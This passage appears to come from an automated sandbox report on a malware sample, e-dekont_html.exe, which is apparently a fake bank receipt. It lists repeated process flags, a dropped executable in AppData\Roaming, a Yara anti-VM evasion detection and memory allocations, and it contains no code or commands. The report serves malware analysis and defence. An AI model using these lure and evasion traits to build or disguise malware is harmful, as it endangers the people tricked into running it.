Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR

Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 25F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 87B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 97B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 99B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: A9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: B000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: C000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: D000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: 2760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: 81F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: 91F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: 93D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Memory allocated: A3D0000 memory reserve \| memory write watch	Jump to behavior
